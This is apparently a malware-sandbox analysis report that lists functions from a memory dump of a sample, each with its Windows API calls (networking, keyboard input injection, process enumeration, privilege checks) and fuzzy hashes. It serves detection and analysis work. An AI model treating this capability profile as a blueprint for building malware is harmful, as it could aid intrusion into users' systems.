Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 59ad0ee0122b87ae1b15f9abf2dbb3e099c69aeb5a4da7955caeda2d1eccfddd
Instruction ID: 6d34876e0ef74a3ed0997f191e451667294bbcd06d53ea43d0c360e99e2a90bd
Opcode Fuzzy Hash: 59ad0ee0122b87ae1b15f9abf2dbb3e099c69aeb5a4da7955caeda2d1eccfddd
Instruction Fuzzy Hash: 3E811D75A00109EFCB08DF98C984DEEB7B9FF89319F204558F506AB254DB71AE46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012F1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 012F14C0

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ed429ee945ae20c88830ab800317078d3c22cb639c6d80cb72ba46a52f713010
Instruction ID: 0f71618522751fb43caba820427a6f302aeadcdff75e2e11e497713f706a2222
Opcode Fuzzy Hash: ed429ee945ae20c88830ab800317078d3c22cb639c6d80cb72ba46a52f713010
Instruction Fuzzy Hash: 6D413A35530107EBDB216BBDDC49ABEBAE8EF91330F98023AFB19D2290E67444614371

Uniqueness

Uniqueness Score: -1.00%

Function 01331AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 01331AFD
WSAGetLastError.WSOCK32 ref: 01331B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01331B8A
WSAGetLastError.WSOCK32 ref: 01331B94

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 0a014e37532a75364b97e73f1e994e556fe63025f917a2bdc3d496ee93352234
Instruction ID: c7782d03ad2158824454c0b4119ecc7b86f32c527e602dfb6af75ffb24a64e28
Opcode Fuzzy Hash: 0a014e37532a75364b97e73f1e994e556fe63025f917a2bdc3d496ee93352234
Instruction Fuzzy Hash: AF41B338600201AFE724AF24C885F767BE5EB94718F54858CFA1A9F7D2D772ED418B90

Uniqueness

Uniqueness Score: -1.00%

Function 012EB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 517fe32421950c382aa9fc65372ed495673c666d03a6d28e7246ce91a7e6ae50
Instruction ID: ca8064fbc1b658efc0a4471823a986d5dbebd3cf91958601d3f07d55212c5366
Opcode Fuzzy Hash: 517fe32421950c382aa9fc65372ed495673c666d03a6d28e7246ce91a7e6ae50
Instruction Fuzzy Hash: 094117B6A20306BFD7259F7CCC49B7ABBE9EB88710F50453EE242DB280D671A5018780

Uniqueness

Uniqueness Score: -1.00%

Function 013256D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 01325783
GetLastError.KERNEL32(?,00000000), ref: 013257A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 013257CE
CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 013257FA

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 9ed712c7bdfd7121af0a28dda0ad01ce00bcbfea9ae53d044d1351968c67541d
Instruction ID: 820ef9d6f153e6d4f3a6e1556ad5d1e4219e521032bdc6aed7d2a641b54884ef
Opcode Fuzzy Hash: 9ed712c7bdfd7121af0a28dda0ad01ce00bcbfea9ae53d044d1351968c67541d
Instruction Fuzzy Hash: A6412C39610611DFCB11EF15C084AADBBE5AF99764B188488EC4A5B361CB74FD40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012ED8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,012D6D71,00000000,00000000,012D82D9,?,012D82D9,?,00000001,012D6D71,8BE85006,00000001,012D82D9,012D82D9), ref: 012ED910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 012ED999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 012ED9AB
__freea.LIBCMT ref: 012ED9B4

Part of subcall function 012E3820: RtlAllocateHeap.NTDLL(00000000,?,01381444,?,012CFDF5,?,?,012BA976,00000010,01381440,012B13FC,?,012B13C6,?,012B1129), ref: 012E3852

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 31676fb28ef5571fc69e3e389f36ad3c05df584fde58a9ef13d64054e8bd0e76
Instruction ID: 7366d40b820853667a168e141a040dea926e8a9d1d5b6f198685a93b7d7c4e5c
Opcode Fuzzy Hash: 31676fb28ef5571fc69e3e389f36ad3c05df584fde58a9ef13d64054e8bd0e76
Instruction Fuzzy Hash: 7731B072A2020BABDF25DFA9DC48EBE7BE6EB41310F450169ED04D7150EB35D950CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0131AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0131AAAC
SetKeyboardState.USER32(00000080), ref: 0131AAC8
PostMessageW.USER32 ref: 0131AB36
SendInput.USER32(00000001,?,0000001C), ref: 0131AB88

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ff893e5091f55160b8e883bebd71be537f4d9354fb2a720d9c262e33fae7fee4
Instruction ID: 9244742d702d0e0530bf149998c63a1e5194236a6add75e8b918e3fec76cd39e
Opcode Fuzzy Hash: ff893e5091f55160b8e883bebd71be537f4d9354fb2a720d9c262e33fae7fee4
Instruction Fuzzy Hash: CD315F70A422C8AFFF39CA6DC804BFA7BAABF44319F04C61AE181531D9D7759581C761

Uniqueness

Uniqueness Score: -1.00%

Function 013416DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 013416EB

Part of subcall function 01313A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01313A57
Part of subcall function 01313A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,013125B3), ref: 01313A5E
Part of subcall function 01313A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 01313A65

GetCaretPos.USER32(?), ref: 013416FF
ClientToScreen.USER32(00000000,?), ref: 0134174C
GetForegroundWindow.USER32 ref: 01341752

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 10ce807fdc7b29d35d04868d4a8ee4035ba8ef7a53783f208df1c3abf9a2a7ca
Instruction ID: c48aff88d5dcf65577c550d5010d2ab10cfde6d2dfcf7ede974ef0e24eab255a
Opcode Fuzzy Hash: 10ce807fdc7b29d35d04868d4a8ee4035ba8ef7a53783f208df1c3abf9a2a7ca
Instruction Fuzzy Hash: C9313075D10149AFD704DFA9C8C08EEBBFDEF58344B5440AAE415E7211D631AE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0131D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0131D501
Process32FirstW.KERNEL32(00000000,?), ref: 0131D50F
Process32NextW.KERNEL32(00000000,?), ref: 0131D52F
CloseHandle.KERNEL32(00000000), ref: 0131D5DC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d5dc0277bad1aef6ae455333c952de7c8371717dc4280782d8fa00b47ce2787c
Instruction ID: 658fbfff9130aa3c4e12a8989198f4d4f6b154d06a72f1d37a3c603c0cfa7b55
Opcode Fuzzy Hash: d5dc0277bad1aef6ae455333c952de7c8371717dc4280782d8fa00b47ce2787c
Instruction Fuzzy Hash: 75318F711083019FD315EF58C884ABFBBE8EF99398F14092DF685861A1EB71A549CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0131D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0134CB68), ref: 0131D2FB
GetLastError.KERNEL32 ref: 0131D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0131D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0134CB68), ref: 0131D376

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: f0dacc3be873ed100a3675e0c0914a9d81925ce29a4629d9a9a302983e8e1c88
Instruction ID: 362966d4593dd34e36a76ee5d1a0e35b9d61b6cf72ec5cb679ec42dd48f2db58
Opcode Fuzzy Hash: f0dacc3be873ed100a3675e0c0914a9d81925ce29a4629d9a9a302983e8e1c88
Instruction Fuzzy Hash: 60219574505302DFC718DF68C4844AE7BE8EE5A368F104E1DF499C72A5DB31E946CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01311571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 01311014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0131102A
Part of subcall function 01311014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01311036
Part of subcall function 01311014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01311045
Part of subcall function 01311014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0131104C
Part of subcall function 01311014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01311062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 013115BE
_memcmp.LIBVCRUNTIME ref: 013115E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01311617
HeapFree.KERNEL32(00000000), ref: 0131161E

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: fee239df4b94f19e0eb46141c311c530cc921719d71d2d1b2e4dcd83f50784ae
Instruction ID: 6af6703486b7de1b09762395ddea08670bce02ac636541e7e24c4feac9dc71bd
Opcode Fuzzy Hash: fee239df4b94f19e0eb46141c311c530cc921719d71d2d1b2e4dcd83f50784ae
Instruction Fuzzy Hash: 3E218371E01109EFDF14DFA8C944BEEBBB8EF44358F194859DA41A7244D731AA05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01342782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0134280A
SetWindowLongW.USER32 ref: 01342824
SetWindowLongW.USER32 ref: 01342832
SetLayeredWindowAttributes.USER32 ref: 01342840

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 84d467e469e93d17ee95b38a63b060114134a2e826a352fe1e4401e0e57aff80
Instruction ID: 14612a529e81f94a385f25b5ece6502ef7d3dda1d84027435a3cea3b1c7a2955
Opcode Fuzzy Hash: 84d467e469e93d17ee95b38a63b060114134a2e826a352fe1e4401e0e57aff80
Instruction Fuzzy Hash: BE21D335205111AFE714DB29D844FAB7F99AF55328F148158F8269B6D2CB71FC42CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0132CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0132CE89
GetLastError.KERNEL32(?,00000000), ref: 0132CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0132CEFE

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 10a17fc065e469b05f17735738fdac74e51ac5c1fd8f5900ab75b95ee5ad38f3
Instruction ID: c038a8b393bbcd47be74765189e7eff75e96dd94353d9ef007332b8f9aa87618
Opcode Fuzzy Hash: 10a17fc065e469b05f17735738fdac74e51ac5c1fd8f5900ab75b95ee5ad38f3
Instruction Fuzzy Hash: 3F21B3B1500715AFEB30EFA9C944BAB7BFCEB40359F10541EE64AD2151EB74EA08CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013178F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 01318D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0131790A,?,000000FF,?,01318754,00000000,?,0000001C,?,?), ref: 01318D8C
Part of subcall function 01318D7D: lstrcpyW.KERNEL32(00000000,?), ref: 01318DB2
Part of subcall function 01318D7D: lstrcmpiW.KERNEL32(00000000,?,0131790A,?,000000FF,?,01318754,00000000,?,0000001C,?,?), ref: 01318DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,01318754,00000000,?,0000001C,?,?,00000000), ref: 01317923
lstrcpyW.KERNEL32(00000000,?), ref: 01317949
lstrcmpiW.KERNEL32(00000002,cdecl,?,01318754,00000000,?,0000001C,?,?,00000000), ref: 01317984

Strings

cdecl, xrefs: 0131797B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: b37b0319f1cd2e2f4a155efea4861fd20ed6b35553fcbc8e818c33797b41dfe3
Instruction ID: 548a53e562128cf66c7ed3cd2f2b689a74fc436da8f348824d55c8dc0f3a0a0d
Opcode Fuzzy Hash: b37b0319f1cd2e2f4a155efea4861fd20ed6b35553fcbc8e818c33797b41dfe3
Instruction Fuzzy Hash: B111263A200302ABDB299F38C844D7A77AAFF85758B40502AE902C7258EF319801C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01345660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 013456BB
_wcslen.LIBCMT ref: 013456CD
_wcslen.LIBCMT ref: 013456D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 01345816

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 6f5a3be36e5d99187d58314b3dc90183c149a5c2e38bfbfb9e14a23774a8abdb
Instruction ID: 6bb0b27c9a53f29159bd9eac98ad027fcb02b29a567f9ef41ede76be513ca2bb
Opcode Fuzzy Hash: 6f5a3be36e5d99187d58314b3dc90183c149a5c2e38bfbfb9e14a23774a8abdb
Instruction Fuzzy Hash: 6C11B175E04209A7EB209F69DC84AFE7BECAF11768F004026EA15E6181EB74A644CF60

Uniqueness

Uniqueness Score: -1.00%

Function 012E1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd6a89139df9db73e5b31218c48d90b0e5320950713ba8b9906f5eb0bb10d1f9
Instruction ID: 1cb3b053468da59605c171e5b68da7ad848fda5ebe520ffd968ce1f104986e6d
Opcode Fuzzy Hash: bd6a89139df9db73e5b31218c48d90b0e5320950713ba8b9906f5eb0bb10d1f9
Instruction Fuzzy Hash: EF018FB222561B7EF72125786CC8F67669CDF813B8BB11335F621911C5DB729C208260

Uniqueness

Uniqueness Score: -1.00%

Function 01311A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 01311A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01311A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01311A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01311A8A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 07579f203e577f32f253c0c0204b412b5a01c85b22c01cb301a1f4cc9e35fd5b
Instruction ID: 6392bdc1ccd04e8d0a87d426f0f9199fd7fc756292de6804c3519ea31b419260
Opcode Fuzzy Hash: 07579f203e577f32f253c0c0204b412b5a01c85b22c01cb301a1f4cc9e35fd5b
Instruction Fuzzy Hash: D8110C3AD01219FFEB11DBA9C985FEDFBB8EB04754F200091EA04B7294D671AE50DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0131E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0131E1FD
MessageBoxW.USER32 ref: 0131E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0131E246
CloseHandle.KERNEL32(00000000), ref: 0131E24D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
